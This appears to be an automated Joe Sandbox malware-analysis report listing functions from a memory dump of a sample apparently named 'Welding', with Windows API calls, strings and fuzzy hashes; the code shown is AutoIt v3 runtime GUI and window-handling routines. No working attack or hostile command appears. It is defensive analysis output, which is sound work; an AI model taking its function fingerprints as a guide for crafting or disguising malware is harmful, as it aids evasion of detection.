CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000B2D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000B2D60
GetClientRect.USER32(00000000,000000FF), ref: 000B2D7E
GetStockObject.GDI32(00000011), ref: 000B2D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 000B2DA5

Part of subcall function 000B2714: GetCursorPos.USER32(?), ref: 000B2727
Part of subcall function 000B2714: ScreenToClient.USER32(001777B0,?), ref: 000B2744
Part of subcall function 000B2714: GetAsyncKeyState.USER32(?), ref: 000B2769
Part of subcall function 000B2714: GetAsyncKeyState.USER32(?), ref: 000B2777

SetTimer.USER32(00000000,00000000,00000028,000B13C7), ref: 000B2DCC

Strings

AutoIt v3 GUI, xrefs: 000B2D44

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: f94855df3bcf52bdf10839fe74b4fd754713142ff22b076d2acdc51420790b06
Instruction ID: cc57e530ba32f5ac649f27d50e98dc78ca357499923255f42c18d10ed723b99f
Opcode Fuzzy Hash: f94855df3bcf52bdf10839fe74b4fd754713142ff22b076d2acdc51420790b06
Instruction Fuzzy Hash: 9CB17A75A0020A9FDB15DFA9DD49FEE7BB4FB08311F104229FA15A72E0DB70A891CB51

Function 000D0429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B

GetForegroundWindow.USER32(00140980,?,?,?,?,?), ref: 000D04E3
IsWindow.USER32(?), ref: 001066BB

Strings

ALL, xrefs: 00106622
HANDLE, xrefs: 0010649E
REGEXPCLASS, xrefs: 00106506
REGEXPTITLE, xrefs: 001064B4
CLASS, xrefs: 001064E5
TITLE, xrefs: 00106650
ACTIVE, xrefs: 00106488
INSTANCE, xrefs: 001065FA
LAST, xrefs: 00106472

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 7d69e9e6188acd13199a3938c84f070669cc152a210c01fbaec99ceecfad5f2f
Instruction ID: 683ea1b77369d2ca584e02ba373ed9582ed5c64e89c137b18f0fb426f1e9f31e
Opcode Fuzzy Hash: 7d69e9e6188acd13199a3938c84f070669cc152a210c01fbaec99ceecfad5f2f
Instruction Fuzzy Hash: 80D1B430104702DBCB04EF20C981AEABBB5BF55344F504A1EF499576A3DB71E969CBA2

Function 0013441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 001344AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0013456C

Strings

VIEWCHANGE, xrefs: 0013472B
ISSELECTED, xrefs: 00134577
GETITEMCOUNT, xrefs: 001344DE
FINDITEM, xrefs: 001346DF
DESELECT, xrefs: 0013465A
SELECT, xrefs: 00134606
SELECTINVERT, xrefs: 0013463C
GETSUBITEMCOUNT, xrefs: 001344F7
SELECTALL, xrefs: 001345D3
GETSELECTEDCOUNT, xrefs: 0013454F
GETSELECTED, xrefs: 0013469A
GETTEXT, xrefs: 00134515
SELECTCLEAR, xrefs: 001345EB

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: d46535c1378aca3f6cf10eb3591685e8726c1d5a1d17663ede608e128111ba60
Instruction ID: 1e671059a93bfda46abb8f792fcd883b007bfc615743756902a95c5dcde6dbd8
Opcode Fuzzy Hash: d46535c1378aca3f6cf10eb3591685e8726c1d5a1d17663ede608e128111ba60
Instruction Fuzzy Hash: 0EA15C702143419FCB14EF24C951AAAB7A6EF95314F108969F8969B3E3DB30FD05CB92

Function 001256C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 001256E1
LoadCursorW.USER32(00000000,00007F8A), ref: 001256EC
LoadCursorW.USER32(00000000,00007F00), ref: 001256F7
LoadCursorW.USER32(00000000,00007F03), ref: 00125702
LoadCursorW.USER32(00000000,00007F8B), ref: 0012570D
LoadCursorW.USER32(00000000,00007F01), ref: 00125718
LoadCursorW.USER32(00000000,00007F81), ref: 00125723
LoadCursorW.USER32(00000000,00007F88), ref: 0012572E
LoadCursorW.USER32(00000000,00007F80), ref: 00125739
LoadCursorW.USER32(00000000,00007F86), ref: 00125744
LoadCursorW.USER32(00000000,00007F83), ref: 0012574F
LoadCursorW.USER32(00000000,00007F85), ref: 0012575A
LoadCursorW.USER32(00000000,00007F82), ref: 00125765
LoadCursorW.USER32(00000000,00007F84), ref: 00125770
LoadCursorW.USER32(00000000,00007F04), ref: 0012577B
LoadCursorW.USER32(00000000,00007F02), ref: 00125786
GetCursorInfo.USER32(?), ref: 00125796
GetLastError.KERNEL32(00000001,00000000), ref: 001257C1

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 9373d204c97fa4c0ceaf81b659de5b4a29707952d52bdbf90e77d46b463f2db0
Instruction ID: 4ce20ba93b857e9a3fd92dbcca96db9832952a30df67f4fefea056d57d7d6b3a
Opcode Fuzzy Hash: 9373d204c97fa4c0ceaf81b659de5b4a29707952d52bdbf90e77d46b463f2db0
Instruction Fuzzy Hash: C0418570E44319AADB109FBA9C49D6EFFF8EF51B10B10452FE509E7291DBB8A500CE51

Function 0010B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0010B17B
__swprintf.LIBCMT ref: 0010B21C
_wcscmp.LIBCMT ref: 0010B22F
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0010B284
_wcscmp.LIBCMT ref: 0010B2C0
GetClassNameW.USER32(?,?,00000400), ref: 0010B2F7
GetDlgCtrlID.USER32(?), ref: 0010B349
GetWindowRect.USER32(?,?), ref: 0010B37F
GetParent.USER32(?), ref: 0010B39D
ScreenToClient.USER32(00000000), ref: 0010B3A4
GetClassNameW.USER32(?,?,00000100), ref: 0010B41E
_wcscmp.LIBCMT ref: 0010B432
GetWindowTextW.USER32(?,?,00000400), ref: 0010B458
_wcscmp.LIBCMT ref: 0010B46C

Part of subcall function 000D385C: _iswctype.LIBCMT ref: 000D3864

Strings

%s%u, xrefs: 0010B216

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 6f2e5155470688e256eb76765c381022a8bf6be7e2108a4e8dc851548246a89c
Instruction ID: bc8df1b7df84d9cfa7db439256590a9961697ba2ef6e6b451322be3b8aba09f9
Opcode Fuzzy Hash: 6f2e5155470688e256eb76765c381022a8bf6be7e2108a4e8dc851548246a89c
Instruction Fuzzy Hash: EBA1BE71208306ABD719DF64C8C4BEAB7A8FF48354F108529F9DAC2191DB70EA55CBA1

Function 0010BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0010BAB1
_wcscmp.LIBCMT ref: 0010BAC2
GetWindowTextW.USER32(00000001,?,00000400), ref: 0010BAEA
CharUpperBuffW.USER32(?,00000000), ref: 0010BB07
_wcscmp.LIBCMT ref: 0010BB25
_wcsstr.LIBCMT ref: 0010BB36
GetClassNameW.USER32(00000018,?,00000400), ref: 0010BB6E
_wcscmp.LIBCMT ref: 0010BB7E
GetWindowTextW.USER32(00000002,?,00000400), ref: 0010BBA5
GetClassNameW.USER32(00000018,?,00000400), ref: 0010BBEE
_wcscmp.LIBCMT ref: 0010BBFE
GetClassNameW.USER32(00000010,?,00000400), ref: 0010BC26
GetWindowRect.USER32(00000004,?), ref: 0010BC8F

Strings

ThumbnailClass, xrefs: 0010BB79, 0010BBF9
@, xrefs: 0010BA92

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 0ae06e8b2e2b9cf2e765aa5c80f452c25cd4e7bd8c797a8d74e7104a24aa93a3
Instruction ID: 7bffe7ccfeb4d004fe51ea8c0b117f521a24c6e98478ac83fed4a654f3cb4c5b
Opcode Fuzzy Hash: 0ae06e8b2e2b9cf2e765aa5c80f452c25cd4e7bd8c797a8d74e7104a24aa93a3
Instruction Fuzzy Hash: 7F819B710083099BEB15DF10C9C5FAAB7E8EF44314F04846AFDC99A0E6DBB4D945CB61

Function 0010B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0010B915

Strings

[REGEXPTITLE:, xrefs: 0010B93D
[HANDLE:, xrefs: 0010B921
ALL, xrefs: 0010B9A9
REGEXP=, xrefs: 0010B92A
[ALL, xrefs: 0010B9BB
[LAST, xrefs: 0010B9C2
[ACTIVE, xrefs: 0010B902
CLASSNAME=, xrefs: 0010B952
HANDLE=, xrefs: 0010B90E
[CLASS:, xrefs: 0010B965
ACTIVE, xrefs: 0010B8F0
LAST, xrefs: 0010B8DA

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 140ef191d3ae2532014c90f31f3f254dbbcbbfcf91b146be690a0efb48a779a1
Instruction ID: 619459379ffbaa90423b3f1e95f4e023683377857c930c03e0488cd618743407
Opcode Fuzzy Hash: 140ef191d3ae2532014c90f31f3f254dbbcbbfcf91b146be690a0efb48a779a1
Instruction Fuzzy Hash: E1312BB5A48205A6CB04FB50CD83FED73B4AF21350FA00129F581B10D3EFE66E14CA52

Function 0010CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0010CBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0010CBBC
SetWindowTextW.USER32(?,?), ref: 0010CBD3
GetDlgItem.USER32(?,000003EA), ref: 0010CBE8
SetWindowTextW.USER32(00000000,?), ref: 0010CBEE
GetDlgItem.USER32(?,000003E9), ref: 0010CBFE
SetWindowTextW.USER32(00000000,?), ref: 0010CC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0010CC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0010CC3F
GetWindowRect.USER32(?,?), ref: 0010CC48
SetWindowTextW.USER32(?,?), ref: 0010CCB3
GetDesktopWindow.USER32 ref: 0010CCB9
GetWindowRect.USER32(00000000), ref: 0010CCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0010CD0C
GetClientRect.USER32(?,?), ref: 0010CD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0010CD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0010CD69

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 887521d4a08186d9f327e03220e44468fd359ef00fff238ee46f3e474d0ea3a1
Instruction ID: e55d19ee907eb600c5a17e575217746a305fa21eb6f64706a486bc259ffd954a
Opcode Fuzzy Hash: 887521d4a08186d9f327e03220e44468fd359ef00fff238ee46f3e474d0ea3a1
Instruction Fuzzy Hash: C9516071900709EFDB21DFA9CE89B6EBBF5FF08705F000618E686A29A0D774A954CF50

Function 0013A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0013A87E
DestroyWindow.USER32(00000000,?), ref: 0013A8F8

Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0013A972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0013A994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0013A9A7
DestroyWindow.USER32(00000000), ref: 0013A9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 0013AA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0013AA19
GetDesktopWindow.USER32 ref: 0013AA32
GetWindowRect.USER32(00000000), ref: 0013AA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0013AA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0013AA69

Part of subcall function 000B29AB: GetWindowLongW.USER32(?,000000EB), ref: 000B29BC

Strings

0, xrefs: 0013A894
tooltips_class32, xrefs: 0013A96B, 0013A9F9

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: fdbad6964465062554367e2de7ba219994c8cb2fa54f60425e1360ed77f4810c
Instruction ID: bf3af075122a60cbd4e35d37d26267429bedc1feb817301a8203f99a79cf17b0
Opcode Fuzzy Hash: fdbad6964465062554367e2de7ba219994c8cb2fa54f60425e1360ed77f4810c
Instruction Fuzzy Hash: 9D71A872144200AFD722CF28CC48FAB7BE5EB89304F48051DF98A972A1D731E991DB62

Function 0013CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3

DragQueryPoint.SHELL32(?,?), ref: 0013CCCF

Part of subcall function 0013B1A9: ClientToScreen.USER32(?,?), ref: 0013B1D2
Part of subcall function 0013B1A9: GetWindowRect.USER32(?,?), ref: 0013B248
Part of subcall function 0013B1A9: PtInRect.USER32(?,?,0013C6BC), ref: 0013B258

SendMessageW.USER32(?,000000B0,?,?), ref: 0013CD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0013CD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0013CD66
_wcscat.LIBCMT ref: 0013CD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0013CDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 0013CDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 0013CDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 0013CDFF
DragFinish.SHELL32(?), ref: 0013CE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0013CEF9

Strings

@GUI_DRAGFILE, xrefs: 0013CEA8
@GUI_DROPID, xrefs: 0013CE26
@GUI_DRAGID, xrefs: 0013CE71

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: f42cf80575b3a5b6a22227e5d7699af3eb000095c320b0eb97564796f663b670
Instruction ID: 7ed67afa7336bc38e483b7d15e9a52fba3603098a9df917ddc75351700383f7f
Opcode Fuzzy Hash: f42cf80575b3a5b6a22227e5d7699af3eb000095c320b0eb97564796f663b670
Instruction Fuzzy Hash: 5C614D71508301AFC711EF64DC85E9FBBF8EF99750F000A2DF695921A2DB709A49CB92

Function 001182D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378COMMON

Download Yara Rule

APIs

#8.OLEAUT32(00000000,00000000,?,?,?,?,?,?,0000002A,00000000,00140980), ref: 0011831A
#10.WSOCK32(00000000,?,?,?,?,?,?,0000002A,00000000,00140980), ref: 00118323
#9.WSOCK32(00000000,?,?,?,?,?,0000002A,00000000,00140980), ref: 0011832F
#185.OLEAUT32(?,?,?,?,0000002A,00000000,00140980), ref: 0011841D
__swprintf.LIBCMT ref: 0011844D
#220.OLEAUT32(?,?,?,?,?,00000029,00000000,Default), ref: 00118479
#8.OLEAUT32(?,?,00000000,00000000), ref: 0011852A
#6.OLEAUT32(?,?), ref: 001185BE
#9.WSOCK32(?), ref: 00118618
#9.WSOCK32(?), ref: 00118627
#8.OLEAUT32(00000000,00000000,?,00000000,00000000), ref: 00118665

Strings

Default, xrefs: 001184DA
%4d%02d%02d%02d%02d%02d, xrefs: 00118447

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: #185#220__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 2563594795-3931177956
Opcode ID: a5f0a3bbdd1dd5c856eb95833a83e9056570654a73641d03d02d9a1da1dc2562
Instruction ID: 94547c8605ab85a44cc2109047defb8d4f3e650c0fa140fb9a6536caa7147aaf
Opcode Fuzzy Hash: a5f0a3bbdd1dd5c856eb95833a83e9056570654a73641d03d02d9a1da1dc2562
Instruction Fuzzy Hash: 69D1EF35614215EBCB2C9F65C884BEEB7B4FF05B00F29C569E415AB692DF30D880DBA1

Function 001349CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00134A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00134AAC

Strings

GETTOTALCOUNT, xrefs: 00134A93
SELECT, xrefs: 00134C5D
UNCHECK, xrefs: 00134C88
COLLAPSE, xrefs: 00134AF2
GETITEMCOUNT, xrefs: 00134B8E
CHECK, xrefs: 00134ACC
EXISTS, xrefs: 00134B15
ISCHECKED, xrefs: 00134C2F
GETSELECTED, xrefs: 00134BBC
GETTEXT, xrefs: 00134BFF
EXPAND, xrefs: 00134B5E

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 5fc5a6818f582f1ebe431b093b7a77cfc126310ccf72f5570d1befe387339548
Instruction ID: 22cabc96e590bf51c818d969d94daf902c8aeca45ea3dd36d5bef9aaf077e44b
Opcode Fuzzy Hash: 5fc5a6818f582f1ebe431b093b7a77cfc126310ccf72f5570d1befe387339548
Instruction Fuzzy Hash: 42915C342047119FCB04EF20C851AAEB7A2AF94354F11885DF8965B3A3DB31FD4ACB96

Function 0013BE70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0013BF26
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00137136,?), ref: 0013BF82
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0013BFBB
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0013BFFE
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0013C035
FreeLibrary.KERNEL32(?), ref: 0013C041
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0013C051
DestroyIcon.USER32(?), ref: 0013C060
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0013C07D
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0013C089

